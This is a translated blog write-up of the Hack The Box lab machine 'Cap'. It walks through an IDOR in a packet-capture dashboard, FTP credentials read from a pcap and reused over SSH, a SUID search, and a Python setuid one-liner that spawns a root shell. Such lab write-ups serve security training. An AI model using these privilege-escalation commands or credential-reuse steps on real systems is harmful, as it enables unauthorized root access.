htb target - Cap

Feb 28, 2025#htb #靶场50

AI Translation

This post is translated from Chinese into English through AI.View Original

AI-generated summary

**Cap** is a Linux machine running an HTTP server that has management functionalities, including network capture. Due to improper control, it suffers from insecure direct object references (IDOR), allowing access to another user's capture, which contains plaintext credentials for gaining a foothold. Subsequently, Linux features are exploited to escalate privileges to root. ### Tasks Summary: 1. **Open TCP Ports**: There are 3 open TCP ports. 2. **Redirection Path**: After running "Security Snapshot," the browser redirects to a path formatted as `/[something]/[id]`, where `[something]` is identified as a specific string. 3. **View Other Users' Scans**: By changing the ID number in the data, other users' scan results can be accessed. 4. **Sensitive Data IDs in PCAP**: The IDs containing sensitive data are specified, with the 0th PCAP file revealing FTP login credentials. 5. **Application Layer Protocol**: Sensitive data appears in the FTP protocol. 6. **FTP Password Reuse**: Nathan's FTP password can also be used for SSH access. 7. **Flag Submission**: The flag in Nathan's home directory can be accessed by logging in via SSH. 8. **Root Flag Submission**: To find the flag in the root directory, check for SUID files and use privilege escalation scripts uploaded to the target machine. Techniques involving Python are provided for privilege escalation.

Cap#

ip:10.10.10.245

Cap is a Linux machine running an HTTP server with a simple difficulty level, which performs management functions including executing network captures. Improper controls lead to insecure direct object references (IDOR), allowing access to captures from another user. The capture contains plaintext credentials that can be used to gain a foothold. Subsequently, Linux features are exploited to escalate to root privileges.

task1
How many TCP ports are open?

0a3b63c90efdde661a0cd2ca8c9fb567_MD5

task2
After running "Security Snapshot," the browser will redirect to a path formatted as /[something]/[id], where [id] represents the scanned ID number. What is [something]?

528ab93b652c321e083476b15704cffc_MD5

task3 Can you view the scan results of other users?

By changing the number id after data, you can view the scan results of other users.

task4 What is the ID of the sensitive data in the PCAP file?

538c44c3ee6e4ab0fa9c8f1e91eb49da_MD5

25d1f22548598d75dda64dcdb92fbaea_MD5

62e53d034c91de170301a5beefb6a543_MD5

The id refers to the number of data, and there is FTP login account information in the 0 pcap file.

task5 In which application layer protocol does sensitive data appear in the pcap file?

ftp

task6 We have obtained Nathan's FTP password. What other services can this password be used for?

ssh

task 7 Submit the flag located in the nathan user's home directory.

ssh nathan@10.10.10.245

The flag can be seen after logging in.

task8 Submit the flag in the root directory.

Check the SUID bit settings.

find / -perm -u=s -type f 2>/dev/null

c7cacbd5aa296cfdad067ce817920fdb_MD5

Privilege escalation script

https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS

Upload to the target machine 10.10.10.245.

9d8d11c9f2f53b0b55e9a9b284497887_MD5

python

Reference: https://gtfobins.github.io/gtfobins/python/

cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

/usr/bin/python3.8

import os
os.setuid(0)
os.system("/bin/bash")

78abb3c1c434aed28bfd4a4e6224ec89_MD5